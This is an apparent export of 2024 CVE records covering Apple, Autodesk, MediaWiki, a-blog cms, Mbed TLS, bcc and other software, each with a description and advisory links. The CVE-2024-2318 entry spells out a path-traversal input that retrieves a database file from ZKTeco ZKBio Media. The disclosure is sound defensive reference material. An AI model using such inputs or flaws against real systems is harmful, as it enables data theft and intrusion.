CVE    2024    23209    Candidate    The issue was addressed with improved memory handling. This issue is fixed in macOS Sonoma 14.3. Processing web content may lead to arbitrary code execution.    FULLDISC:20240126 APPLE-SA-01-22-2024-5 macOS Sonoma 14.3   |   URL:http://seclists.org/fulldisclosure/2024/Jan/36   |   MISC:https://support.apple.com/en-us/HT214061   |   URL:https://support.apple.com/en-us/HT214061    Assigned (20240112)
CVE    2024    23208    Candidate    The issue was addressed with improved memory handling. This issue is fixed in macOS Sonoma 14.3, watchOS 10.3, tvOS 17.3, iOS 17.3 and iPadOS 17.3. An app may be able to execute arbitrary code with kernel privileges.    FULLDISC:20240126 APPLE-SA-01-22-2024-2 iOS 17.3 and iPadOS 17.3   |   URL:http://seclists.org/fulldisclosure/2024/Jan/33   |   FULLDISC:20240126 APPLE-SA-01-22-2024-5 macOS Sonoma 14.3   |   URL:http://seclists.org/fulldisclosure/2024/Jan/36   |   FULLDISC:20240126 APPLE-SA-01-22-2024-8 watchOS 10.3   |   URL:http://seclists.org/fulldisclosure/2024/Jan/39   |   FULLDISC:20240126 APPLE-SA-01-22-2024-9 tvOS 17.3   |   URL:http://seclists.org/fulldisclosure/2024/Jan/40   |   MISC:https://support.apple.com/en-us/HT214055   |   URL:https://support.apple.com/en-us/HT214055   |   MISC:https://support.apple.com/en-us/HT214059   |   URL:https://support.apple.com/en-us/HT214059   |   MISC:https://support.apple.com/en-us/HT214060   |   URL:https://support.apple.com/en-us/HT214060   |   MISC:https://support.apple.com/en-us/HT214061   |   URL:https://support.apple.com/en-us/HT214061    Assigned (20240112)
CVE    2024    23207    Candidate    This issue was addressed with improved redaction of sensitive information. This issue is fixed in watchOS 10.3, iOS 17.3 and iPadOS 17.3, macOS Sonoma 14.3, macOS Ventura 13.6.4, macOS Monterey 12.7.3. An app may be able to access sensitive user data.    FULLDISC:20240126 APPLE-SA-01-22-2024-2 iOS 17.3 and iPadOS 17.3   |   URL:http://seclists.org/fulldisclosure/2024/Jan/33   |   FULLDISC:20240126 APPLE-SA-01-22-2024-5 macOS Sonoma 14.3   |   URL:http://seclists.org/fulldisclosure/2024/Jan/36   |   FULLDISC:20240126 APPLE-SA-01-22-2024-6 macOS Ventura 13.6.4   |   URL:http://seclists.org/fulldisclosure/2024/Jan/37   |   FULLDISC:20240126 APPLE-SA-01-22-2024-7 macOS Monterey 12.7.3   |   URL:http://seclists.org/fulldisclosure/2024/Jan/38   |   FULLDISC:20240126 APPLE-SA-01-22-2024-8 watchOS 10.3   |   URL:http://seclists.org/fulldisclosure/2024/Jan/39   |   MISC:https://support.apple.com/en-us/HT214057   |   URL:https://support.apple.com/en-us/HT214057   |   MISC:https://support.apple.com/en-us/HT214058   |   URL:https://support.apple.com/en-us/HT214058   |   MISC:https://support.apple.com/en-us/HT214059   |   URL:https://support.apple.com/en-us/HT214059   |   MISC:https://support.apple.com/en-us/HT214060   |   URL:https://support.apple.com/en-us/HT214060   |   MISC:https://support.apple.com/en-us/HT214061   |   URL:https://support.apple.com/en-us/HT214061    Assigned (20240112)
CVE    2024    23206    Candidate    An access issue was addressed with improved access restrictions. This issue is fixed in watchOS 10.3, tvOS 17.3, iOS 17.3 and iPadOS 17.3, macOS Sonoma 14.3, iOS 16.7.5 and iPadOS 16.7.5, Safari 17.3. A maliciously crafted webpage may be able to fingerprint the user.    FEDORA:FEDORA-2024-97faaca23d   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/X2VJMEDT4GL42AQVHSYOT6DIVJDZWIV4/   |   FEDORA:FEDORA-2024-ca3f071aea   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/US43EQFC2IS66EA2CPAZFH2RQ6WD7PKF/   |   FULLDISC:20240126 APPLE-SA-01-22-2024-1 Safari 17.3   |   URL:http://seclists.org/fulldisclosure/2024/Jan/27   |   FULLDISC:20240126 APPLE-SA-01-22-2024-2 iOS 17.3 and iPadOS 17.3   |   URL:http://seclists.org/fulldisclosure/2024/Jan/33   |   FULLDISC:20240126 APPLE-SA-01-22-2024-3 iOS 16.7.5 and iPadOS 16.7.5   |   URL:http://seclists.org/fulldisclosure/2024/Jan/34   |   FULLDISC:20240126 APPLE-SA-01-22-2024-5 macOS Sonoma 14.3   |   URL:http://seclists.org/fulldisclosure/2024/Jan/36   |   FULLDISC:20240126 APPLE-SA-01-22-2024-8 watchOS 10.3   |   URL:http://seclists.org/fulldisclosure/2024/Jan/39   |   FULLDISC:20240126 APPLE-SA-01-22-2024-9 tvOS 17.3   |   URL:http://seclists.org/fulldisclosure/2024/Jan/40   |   MISC:https://support.apple.com/en-us/HT214055   |   URL:https://support.apple.com/en-us/HT214055   |   MISC:https://support.apple.com/en-us/HT214056   |   URL:https://support.apple.com/en-us/HT214056   |   MISC:https://support.apple.com/en-us/HT214059   |   URL:https://support.apple.com/en-us/HT214059   |   MISC:https://support.apple.com/en-us/HT214060   |   URL:https://support.apple.com/en-us/HT214060   |   MISC:https://support.apple.com/en-us/HT214061   |   URL:https://support.apple.com/en-us/HT214061   |   MISC:https://support.apple.com/en-us/HT214063   |   URL:https://support.apple.com/en-us/HT214063   |   MLIST:[oss-security] 20240206 WebKitGTK and WPE WebKit Security Advisory WSA-2024-0001   |   URL:http://www.openwall.com/lists/oss-security/2024/02/05/8    Assigned (20240112)
CVE    2024    23205    Candidate    A privacy issue was addressed with improved private data redaction for log entries. This issue is fixed in macOS Sonoma 14.4, iOS 17.4 and iPadOS 17.4. An app may be able to access sensitive user data.    FULLDISC:20240313 APPLE-SA-03-07-2024-2 macOS Sonoma 14.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/21   |   MISC:https://support.apple.com/en-us/HT214081   |   URL:https://support.apple.com/en-us/HT214081   |   MISC:https://support.apple.com/en-us/HT214084   |   URL:https://support.apple.com/en-us/HT214084    Assigned (20240112)
CVE    2024    23204    Candidate    The issue was addressed with additional permissions checks. This issue is fixed in macOS Sonoma 14.3, watchOS 10.3, iOS 17.3 and iPadOS 17.3. A shortcut may be able to use sensitive data with certain actions without prompting the user.    CONFIRM:https://support.apple.com/kb/HT214082   |   CONFIRM:https://support.apple.com/kb/HT214083   |   CONFIRM:https://support.apple.com/kb/HT214085   |   FULLDISC:20240126 APPLE-SA-01-22-2024-2 iOS 17.3 and iPadOS 17.3   |   URL:http://seclists.org/fulldisclosure/2024/Jan/33   |   FULLDISC:20240126 APPLE-SA-01-22-2024-5 macOS Sonoma 14.3   |   URL:http://seclists.org/fulldisclosure/2024/Jan/36   |   FULLDISC:20240126 APPLE-SA-01-22-2024-8 watchOS 10.3   |   URL:http://seclists.org/fulldisclosure/2024/Jan/39   |   FULLDISC:20240313 APPLE-SA-03-07-2024-3 macOS Ventura 13.6.5   |   URL:http://seclists.org/fulldisclosure/2024/Mar/22   |   FULLDISC:20240313 APPLE-SA-03-07-2024-4 macOS Monterey 12.7.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/23   |   MISC:https://support.apple.com/en-us/HT214059   |   URL:https://support.apple.com/en-us/HT214059   |   MISC:https://support.apple.com/en-us/HT214060   |   URL:https://support.apple.com/en-us/HT214060   |   MISC:https://support.apple.com/en-us/HT214061   |   URL:https://support.apple.com/en-us/HT214061    Assigned (20240112)
CVE    2024    23203    Candidate    The issue was addressed with additional permissions checks. This issue is fixed in macOS Sonoma 14.3, iOS 17.3 and iPadOS 17.3. A shortcut may be able to use sensitive data with certain actions without prompting the user.    CONFIRM:https://support.apple.com/kb/HT214082   |   CONFIRM:https://support.apple.com/kb/HT214085   |   FULLDISC:20240126 APPLE-SA-01-22-2024-2 iOS 17.3 and iPadOS 17.3   |   URL:http://seclists.org/fulldisclosure/2024/Jan/33   |   FULLDISC:20240126 APPLE-SA-01-22-2024-5 macOS Sonoma 14.3   |   URL:http://seclists.org/fulldisclosure/2024/Jan/36   |   FULLDISC:20240313 APPLE-SA-03-07-2024-3 macOS Ventura 13.6.5   |   URL:http://seclists.org/fulldisclosure/2024/Mar/22   |   MISC:https://support.apple.com/en-us/HT214059   |   URL:https://support.apple.com/en-us/HT214059   |   MISC:https://support.apple.com/en-us/HT214061   |   URL:https://support.apple.com/en-us/HT214061    Assigned (20240112)
CVE    2024    23201    Candidate    A permissions issue was addressed with additional restrictions. This issue is fixed in macOS Monterey 12.7.4, watchOS 10.3, tvOS 17.3, macOS Ventura 13.6.5, iOS 17.3 and iPadOS 17.3, macOS Sonoma 14.3. An app may be able to cause a denial-of-service.    CONFIRM:https://support.apple.com/kb/HT214055   |   CONFIRM:https://support.apple.com/kb/HT214059   |   CONFIRM:https://support.apple.com/kb/HT214060   |   CONFIRM:https://support.apple.com/kb/HT214061   |   FULLDISC:20240313 APPLE-SA-03-07-2024-3 macOS Ventura 13.6.5   |   URL:http://seclists.org/fulldisclosure/2024/Mar/22   |   FULLDISC:20240313 APPLE-SA-03-07-2024-4 macOS Monterey 12.7.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/23   |   MISC:https://support.apple.com/en-us/HT214055   |   URL:https://support.apple.com/en-us/HT214055   |   MISC:https://support.apple.com/en-us/HT214059   |   URL:https://support.apple.com/en-us/HT214059   |   MISC:https://support.apple.com/en-us/HT214060   |   URL:https://support.apple.com/en-us/HT214060   |   MISC:https://support.apple.com/en-us/HT214061   |   URL:https://support.apple.com/en-us/HT214061   |   MISC:https://support.apple.com/en-us/HT214083   |   URL:https://support.apple.com/en-us/HT214083   |   MISC:https://support.apple.com/en-us/HT214085   |   URL:https://support.apple.com/en-us/HT214085    Assigned (20240112)
CVE    2024    23196    Candidate    A race condition was found in the Linux kernel's sound/hda device driver in snd_hdac_regmap_sync() function. This can result in a null pointer dereference issue, possibly leading to a kernel panic or denial of service issue.    MISC:https://bugzilla.openanolis.cn/show_bug.cgi?id=8148   |   URL:https://bugzilla.openanolis.cn/show_bug.cgi?id=8148    Assigned (20240115)
CVE    2024    2319    Candidate    Cross-Site Scripting (XSS) vulnerability in the Django MarkdownX project, affecting version 4.0.2. An attacker could store a specially crafted JavaScript payload in the upload functionality due to lack of proper sanitisation of JavaScript elements.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/cross-site-scripting-vulnerability-django-markdownx   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/cross-site-scripting-vulnerability-django-markdownx    Assigned (20240308)
CVE    2024    23183    Candidate    Cross-site scripting vulnerability in a-blog cms Ver.3.1.x series versions prior to Ver.3.1.7, Ver.3.0.x series versions prior to Ver.3.0.29, Ver.2.11.x series versions prior to Ver.2.11.58, Ver.2.10.x series versions prior to Ver.2.10.50, and Ver.2.9.0 and earlier allows a remote authenticated attacker to execute an arbitrary script on the logged-in user's web browser.    MISC:https://developer.a-blogcms.jp/blog/news/JVN-34565930.html   |   URL:https://developer.a-blogcms.jp/blog/news/JVN-34565930.html   |   MISC:https://jvn.jp/en/jp/JVN34565930/   |   URL:https://jvn.jp/en/jp/JVN34565930/    Assigned (20240112)
CVE    2024    23182    Candidate    Relative path traversal vulnerability in a-blog cms Ver.3.1.x series versions prior to Ver.3.1.7, Ver.3.0.x series versions prior to Ver.3.0.29, Ver.2.11.x series versions prior to Ver.2.11.58, Ver.2.10.x series versions prior to Ver.2.10.50, and Ver.2.9.0 and earlier allows a remote authenticated attacker to delete arbitrary files on the server.    MISC:https://developer.a-blogcms.jp/blog/news/JVN-34565930.html   |   URL:https://developer.a-blogcms.jp/blog/news/JVN-34565930.html   |   MISC:https://jvn.jp/en/jp/JVN34565930/   |   URL:https://jvn.jp/en/jp/JVN34565930/    Assigned (20240112)
CVE    2024    23181    Candidate    Cross-site scripting vulnerability in a-blog cms Ver.3.1.x series versions prior to Ver.3.1.7, Ver.3.0.x series versions prior to Ver.3.0.29, Ver.2.11.x series versions prior to Ver.2.11.58, Ver.2.10.x series versions prior to Ver.2.10.50, and Ver.2.9.0 and earlier allows a remote unauthenticated attacker to execute an arbitrary script on the logged-in user's web browser.    MISC:https://developer.a-blogcms.jp/blog/news/JVN-34565930.html   |   URL:https://developer.a-blogcms.jp/blog/news/JVN-34565930.html   |   MISC:https://jvn.jp/en/jp/JVN34565930/   |   URL:https://jvn.jp/en/jp/JVN34565930/    Assigned (20240112)
CVE    2024    23180    Candidate    Improper input validation vulnerability in a-blog cms Ver.3.1.x series versions prior to Ver.3.1.7, Ver.3.0.x series versions prior to Ver.3.0.29, Ver.2.11.x series versions prior to Ver.2.11.58, Ver.2.10.x series versions prior to Ver.2.10.50, and Ver.2.9.0 and earlier allows a remote authenticated attacker to execute arbitrary code by uploading a specially crafted SVG file.    MISC:https://developer.a-blogcms.jp/blog/news/JVN-34565930.html   |   URL:https://developer.a-blogcms.jp/blog/news/JVN-34565930.html   |   MISC:https://jvn.jp/en/jp/JVN34565930/   |   URL:https://jvn.jp/en/jp/JVN34565930/    Assigned (20240112)
CVE    2024    2318    Candidate    A vulnerability was found in ZKTeco ZKBio Media 2.0.0_x64_2024-01-29-1028. It has been classified as problematic. Affected is an unknown function of the file /pro/common/download of the component Service Port 9999. The manipulation of the argument fileName with the input ../../../../zkbio_media.sql leads to path traversal: '../filedir'. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-256272. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-256272 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.256272   |   MISC:VDB-256272 | ZKTeco ZKBio Media Service Port 9999 download path traversal   |   URL:https://vuldb.com/?id.256272   |   MISC:https://gist.github.com/whiteman007/a3b25a7ddf38774329d72930e0cd841a   |   URL:https://gist.github.com/whiteman007/a3b25a7ddf38774329d72930e0cd841a    Assigned (20240308)
CVE    2024    23179    Candidate    An issue was discovered in the GlobalBlocking extension in MediaWiki before 1.40.2. For a Special:GlobalBlock?uselang=x-xss URI, i18n-based XSS can occur via the parentheses message. This affects subtitle links in buildSubtitleLinks.    MISC:https://lists.wikimedia.org/hyperkitty/list/mediawiki-announce@lists.wikimedia.org/message/TDBUBCCOQJUT4SCHJNPHKQNPBUUETY52/   |   MISC:https://phabricator.wikimedia.org/T347746    Assigned (20240112)
CVE    2024    23178    Candidate    An issue was discovered in the Phonos extension in MediaWiki before 1.40.2. PhonosButton.js allows i18n-based XSS via the phonos-purge-needed-error message.    MISC:https://lists.wikimedia.org/hyperkitty/list/mediawiki-announce@lists.wikimedia.org/message/TDBUBCCOQJUT4SCHJNPHKQNPBUUETY52/   |   MISC:https://phabricator.wikimedia.org/T349312    Assigned (20240112)
CVE    2024    23177    Candidate    An issue was discovered in the WatchAnalytics extension in MediaWiki before 1.40.2. XSS can occur via the Special:PageStatistics page parameter.    MISC:https://lists.wikimedia.org/hyperkitty/list/mediawiki-announce@lists.wikimedia.org/message/TDBUBCCOQJUT4SCHJNPHKQNPBUUETY52/   |   MISC:https://phabricator.wikimedia.org/T348979    Assigned (20240112)
CVE    2024    23174    Candidate    An issue was discovered in the PageTriage extension in MediaWiki before 1.35.14, 1.36.x through 1.39.x before 1.39.6, and 1.40.x before 1.40.2. XSS can occur via the rev-deleted-user, pagetriage-tags-quickfilter-label, pagetriage-triage, pagetriage-filter-date-range-format-placeholder, pagetriage-filter-date-range-to, pagetriage-filter-date-range-from, pagetriage-filter-date-range-heading, pagetriage-filter-set-button, or pagetriage-filter-reset-button message.    MISC:https://gerrit.wikimedia.org/r/c/mediawiki/extensions/PageTriage/+/989177   |   MISC:https://phabricator.wikimedia.org/T347704    Assigned (20240112)
CVE    2024    23173    Candidate    An issue was discovered in the Cargo extension in MediaWiki before 1.35.14, 1.36.x through 1.39.x before 1.39.6, and 1.40.x before 1.40.2. The Special:Drilldown page allows XSS via artist, album, and position parameters because of applied filter values in drilldown/CargoAppliedFilter.php.    MISC:https://gerrit.wikimedia.org/r/c/mediawiki/extensions/Cargo/+/965214   |   MISC:https://phabricator.wikimedia.org/T348687    Assigned (20240112)
CVE    2024    23172    Candidate    An issue was discovered in the CheckUser extension in MediaWiki before 1.35.14, 1.36.x through 1.39.x before 1.39.6, and 1.40.x before 1.40.2. XSS can occur via message definitions, e.g., in SpecialCheckUserLog.    MISC:https://gerrit.wikimedia.org/r/c/mediawiki/extensions/CheckUser/+/989179   |   MISC:https://phabricator.wikimedia.org/T347708    Assigned (20240112)
CVE    2024    23171    Candidate    An issue was discovered in the CampaignEvents extension in MediaWiki before 1.35.14, 1.36.x through 1.39.x before 1.39.6, and 1.40.x before 1.40.2. The Special:EventDetails page allows XSS via the x-xss language setting for internationalization (i18n).    MISC:https://gerrit.wikimedia.org/r/q/I70d71c409193e904684dfb706d424b0a815fa6f6   |   MISC:https://phabricator.wikimedia.org/T348343    Assigned (20240112)
CVE    2024    23170    Candidate    An issue was discovered in Mbed TLS 2.x before 2.28.7 and 3.x before 3.5.2. There was a timing side channel in RSA private operations. This side channel could be sufficient for a local attacker to recover the plaintext. It requires the attacker to send a large number of messages for decryption, as described in "Everlasting ROBOT: the Marvin Attack" by Hubert Kario.    FEDORA:FEDORA-2024-bfd98be425   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/IIBPEYSVRK4IFLBSYJAWKH33YBNH5HR2/   |   FEDORA:FEDORA-2024-c7f1c839ac   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GP5UU7Z6LJNBLBT4SC5WWS2HDNMTFZH5/   |   MISC:https://mbed-tls.readthedocs.io/en/latest/security-advisories/mbedtls-security-advisory-2024-01-1/    Assigned (20240112)
CVE    2024    2317    Candidate    A vulnerability was found in Bdtask Hospital AutoManager up to 20240227 and classified as problematic. This issue affects some unknown processing of the file /prescription/prescription/delete/ of the component Prescription Page. The manipulation leads to improper authorization. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-256271. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-256271 | Bdtask Hospital AutoManager Prescription Page improper authorization   |   URL:https://vuldb.com/?id.256271   |   MISC:VDB-256271 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.256271   |   MISC:https://drive.google.com/file/d/13-Fxw8fw3VP1PvL0fYvDBVlpTDQHyCkc/view?usp=sharing   |   URL:https://drive.google.com/file/d/13-Fxw8fw3VP1PvL0fYvDBVlpTDQHyCkc/view?usp=sharing    Assigned (20240308)
CVE    2024    2316    Candidate    A vulnerability has been found in Bdtask Hospital AutoManager up to 20240227 and classified as problematic. This vulnerability affects unknown code of the file /billing/bill/edit/ of the component Update Bill Page. The manipulation leads to cross-site request forgery. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-256270 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-256270 | Bdtask Hospital AutoManager Update Bill Page cross-site request forgery   |   URL:https://vuldb.com/?id.256270   |   MISC:VDB-256270 | CTI Indicators (IOB, IOC, IOA)   |   URL:https://vuldb.com/?ctiid.256270   |   MISC:https://drive.google.com/file/d/1v_Ee2FWlbpLgHYIl88COPp05EHSxUWI0/view?usp=sharing   |   URL:https://drive.google.com/file/d/1v_Ee2FWlbpLgHYIl88COPp05EHSxUWI0/view?usp=sharing    Assigned (20240308)
CVE    2024    2314    Candidate    If kernel headers need to be extracted, bcc will attempt to load them from a temporary directory. An unprivileged attacker could use this to force bcc to load compromised Linux headers. Linux distributions which provide kernel headers by default are not affected by default.    MISC:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-2314   |   URL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-2314   |   MISC:https://github.com/iovisor/bcc/commit/008ea09e891194c072f2a9305a3c872a241dc342   |   URL:https://github.com/iovisor/bcc/commit/008ea09e891194c072f2a9305a3c872a241dc342    Assigned (20240307)
CVE    2024    23139    Candidate    An Out-Of-Bounds Write Vulnerability in Autodesk FBX Review version 1.5.3.0 and prior may lead to code execution or information disclosure through maliciously crafted ActionScript Byte Code “ABC” files. ABC files are created by the Flash compiler and contain executable code. This vulnerability in conjunction with other vulnerabilities could lead to code execution in the context of the current process.    MISC:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0005   |   URL:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0005    Assigned (20240111)
CVE    2024    23138    Candidate    A maliciously crafted DWG file when parsed through Autodesk DWG TrueView can be used to cause a Stack-based Overflow. A malicious actor can leverage this vulnerability to cause a crash, read sensitive data, or execute arbitrary code in the context of the current process.    MISC:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0006   |   URL:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0006    Assigned (20240111)
CVE    2024    23137    Candidate    A maliciously crafted STP or SLDPRT file in ODXSW_DLL.dll when parsed through Autodesk AutoCAD can be used to cause use of an uninitialized variable. This vulnerability, along with other vulnerabilities, could lead to code execution in the current process.    MISC:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0002   |   URL:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0002   |   MISC:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0004   |   URL:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0004    Assigned (20240111)
CVE    2024    23136    Candidate    A maliciously crafted STP file in ASMKERN228A.dll when parsed through Autodesk AutoCAD can be used to dereference an untrusted pointer. This vulnerability, along with other vulnerabilities, could lead to code execution in the current process.    MISC:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0002   |   URL:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0002   |   MISC:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0004   |   URL:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0004    Assigned (20240111)
CVE    2024    23135    Candidate    A maliciously crafted SLDPRT file in ASMkern228A.dll when parsed through Autodesk AutoCAD can be used in a use-after-free vulnerability. This vulnerability, along with other vulnerabilities, could lead to code execution in the current process.    MISC:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0002   |   URL:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0002   |   MISC:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0004   |   URL:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0004    Assigned (20240111)
CVE    2024    23134    Candidate    A maliciously crafted IGS file in tbb.dll when parsed through Autodesk AutoCAD can be used in a use-after-free vulnerability. This vulnerability, along with other vulnerabilities, could lead to code execution in the current process.    MISC:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0002   |   URL:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0002   |   MISC:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0004   |   URL:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0004    Assigned (20240111)
CVE    2024    23133    Candidate    A maliciously crafted STP file in ASMDATAX228A.dll when parsed through Autodesk AutoCAD could lead to a memory corruption vulnerability by write access violation. This vulnerability in conjunction with other vulnerabilities could lead to code execution in the context of the current process.    MISC:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0002   |   URL:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0002   |   MISC:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0004   |   URL:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0004    Assigned (20240111)
CVE    2024    23132    Candidate    A maliciously crafted STP file in atf_dwg_consumer.dll when parsed through Autodesk AutoCAD could lead to a memory corruption vulnerability by write access violation. This vulnerability in conjunction with other vulnerabilities could lead to code execution in the context of the current process.    MISC:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0002   |   URL:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0002   |   MISC:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0004   |   URL:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0004    Assigned (20240111)
CVE    2024    23131    Candidate    A maliciously crafted STP file in ASMKERN228A.dll or ASMDATAX228A.dll when parsed through Autodesk AutoCAD could lead to a memory corruption vulnerability by write access violation. This vulnerability in conjunction with other vulnerabilities could lead to code execution in the context of the current process.    MISC:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0002   |   URL:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0002   |   MISC:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0004   |   URL:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0004    Assigned (20240111)
CVE    2024    23130    Candidate    A maliciously crafted SLDASM or SLDPRT file in ODXSW_DLL.dll when parsed through Autodesk AutoCAD could lead to a memory corruption vulnerability by write access violation. This vulnerability in conjunction with other vulnerabilities could lead to code execution in the context of the current process.    MISC:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0002   |   URL:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0002   |   MISC:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0004   |   URL:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0004    Assigned (20240111)
CVE    2024    2313    Candidate    If kernel headers need to be extracted, bpftrace will attempt to load them from a temporary directory. An unprivileged attacker could use this to force bcc to load compromised Linux headers. Linux distributions which provide kernel headers by default are not affected by default.    MISC:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-2313   |   URL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-2313   |   MISC:https://github.com/bpftrace/bpftrace/commit/4be4b7191acb8218240e6b7178c30fa8c9b59998   |   URL:https://github.com/bpftrace/bpftrace/commit/4be4b7191acb8218240e6b7178c30fa8c9b59998    Assigned (20240307)
CVE    2024    23129    Candidate    A maliciously crafted MODEL, 3DM, STP or SLDASM file in opennurbs.dll when parsed through Autodesk AutoCAD could lead to a memory corruption vulnerability by write access violation. This vulnerability in conjunction with other vulnerabilities could lead to code execution in the context of the current process.    MISC:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0002   |   URL:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0002   |   MISC:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0004   |   URL:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0004    Assigned (20240111)
CVE    2024    23128    Candidate    A maliciously crafted MODEL file in libodxdll.dll when parsed through Autodesk AutoCAD could lead to a memory corruption vulnerability by write access violation. This vulnerability in conjunction with other vulnerabilities could lead to code execution in the context of the current process.    MISC:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0002   |   URL:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0002   |   MISC:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0004   |   URL:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0004    Assigned (20240111)
CVE    2024    23127    Candidate    A maliciously crafted MODEL, SLDPRT or SLDASM file in VCRUNTIME140.dll when parsed through Autodesk AutoCAD can be used to cause a Heap-based Overflow. A malicious actor can leverage this vulnerability to cause a crash, read sensitive data, or execute arbitrary code in the context of the current process.    MISC:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0002   |   URL:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0002   |   MISC:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0004   |   URL:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0004    Assigned (20240111)
CVE    2024    23126    Candidate    A maliciously crafted CATPART file in CC5Dll.dll when parsed through Autodesk AutoCAD can be used to cause a Stack-based Overflow. A malicious actor can leverage this vulnerability to cause a crash, read sensitive data, or execute arbitrary code in the context of the current process.    MISC:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0002   |   URL:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0002   |   MISC:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0004   |   URL:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0004    Assigned (20240111)
CVE    2024    23125    Candidate    A maliciously crafted SLDPRT file in ODXSW_DLL.dll when parsed through Autodesk AutoCAD can be used to cause a Stack-based Overflow. A malicious actor can leverage this vulnerability to cause a crash, read sensitive data, or execute arbitrary code in the context of the current process.    MISC:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0002   |   URL:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0002    Assigned (20240111)
CVE    2024    23124    Candidate    A maliciously crafted STP file in ASMIMPORT228A.dll when parsed through Autodesk AutoCAD can force an Out-of-Bound Write. A malicious actor can leverage this vulnerability to cause a crash, write sensitive data, or execute arbitrary code in the context of the current process.    MISC:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0002   |   URL:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0002   |   MISC:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0004   |   URL:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0004    Assigned (20240111)
CVE    2024    23123    Candidate    A maliciously crafted CATPART file in CC5Dll.dll or ASMBASE228A.dll when parsed through Autodesk AutoCAD can force an Out-of-Bound Write. A malicious actor can leverage this vulnerability to cause a crash, write sensitive data, or execute arbitrary code in the context of the current process.    MISC:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0002   |   URL:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0002   |   MISC:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0004   |   URL:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0004    Assigned (20240111)
